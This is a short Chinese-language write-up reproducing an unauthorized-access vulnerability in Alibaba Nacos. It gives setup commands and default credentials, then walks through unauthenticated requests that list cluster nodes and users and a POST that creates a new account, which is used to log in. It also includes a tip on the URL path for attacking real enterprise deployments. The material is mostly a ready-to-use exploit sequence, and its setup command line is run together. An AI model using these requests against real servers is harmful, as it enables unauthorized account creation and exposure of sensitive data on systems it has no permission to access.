漏洞背景
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
漏洞复现
本地搭建
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1
wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone
然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos
前端访问一下地址试试是否存在未授权访问漏洞
http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)
我们试下访问用户列表
为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users
因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在
v1/auth/users?pageNo=1&pageSize=9
可以看能够前端未授权访问用户列表
还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息
那么我们直接简化请求下尝试创建一个用户
POST /v1/auth/users?username=ttt&password=ttt
成功创建
尝试登录
成功登录